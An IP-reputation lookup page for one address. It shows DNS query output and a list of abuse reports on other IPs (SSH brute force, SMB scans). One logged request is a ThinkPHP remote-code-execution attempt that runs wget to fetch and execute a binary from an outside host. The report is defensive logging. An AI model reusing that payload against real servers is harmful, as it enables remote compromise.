Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Germany

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 53.231.149.82
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51397
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;53.231.149.82.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025013100 1800 900 604800 86400

;; Query time: 36 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Jan 31 20:26:30 CST 2025
;; MSG SIZE  rcvd: 106
Host info
Host 82.149.231.53.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 82.149.231.53.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
191.53.221.248 attack
smtp auth brute force
2019-06-28 21:29:53
191.53.195.44 attack
SMTP-sasl brute force
...
2019-06-28 22:21:13
182.255.63.57 attackbots
Jun 28 15:24:52 server sshd[28616]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.255.63.57
...
2019-06-28 21:39:38
180.175.183.165 attackspam
TCP port 445 (SMB) attempt blocked by firewall. [2019-06-28 15:51:05]
2019-06-28 22:24:39
125.213.135.238 attack
Unauthorized connection attempt from IP address 125.213.135.238 on Port 445(SMB)
2019-06-28 21:33:19
185.176.27.34 attackbotsspam
28.06.2019 13:17:54 Connection to port 15491 blocked by firewall
2019-06-28 21:30:24
59.4.8.206 attack
59.4.8.206 - - \[28/Jun/2019:15:51:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://198.12.97.68/bins/UnHAnaAW.x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
...
2019-06-28 22:23:21
94.199.17.121 attack
firewall-block, port(s): 445/tcp
2019-06-28 21:41:11
196.52.43.100 attackbots
Jun 28 13:51:41 **** sshd[30577]: Did not receive identification string from 196.52.43.100 port 63234
2019-06-28 22:25:45
36.82.102.124 attack
Unauthorized connection attempt from IP address 36.82.102.124 on Port 445(SMB)
2019-06-28 21:35:09
106.12.222.70 attackspam
Attempted SSH login
2019-06-28 22:10:19
46.105.244.17 attackspam
web-1 [ssh] SSH Attack
2019-06-28 22:11:06
203.48.246.66 attackbots
Jun 28 07:04:09 herz-der-gamer sshd[1230]: Invalid user admin from 203.48.246.66 port 45406
Jun 28 07:04:09 herz-der-gamer sshd[1230]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.48.246.66
Jun 28 07:04:09 herz-der-gamer sshd[1230]: Invalid user admin from 203.48.246.66 port 45406
Jun 28 07:04:11 herz-der-gamer sshd[1230]: Failed password for invalid user admin from 203.48.246.66 port 45406 ssh2
...
2019-06-28 21:49:16
82.114.111.6 attack
Unauthorised access (Jun 28) SRC=82.114.111.6 LEN=48 TTL=117 ID=30427 DF TCP DPT=445 WINDOW=8192 SYN
2019-06-28 21:47:58
171.253.189.11 attackbots
Unauthorized connection attempt from IP address 171.253.189.11 on Port 445(SMB)
2019-06-28 21:34:39

Recently Reported IPs

218.101.76.87 225.76.105.246 90.214.240.206 98.189.147.155
41.179.91.126 8.185.11.214 171.113.72.144 22.24.239.130
109.190.136.97 233.49.172.158 22.163.219.33 192.181.41.201
152.20.240.249 47.238.35.8 64.157.198.219 100.84.64.241
137.73.207.63 76.184.40.254 182.135.238.119 101.16.160.190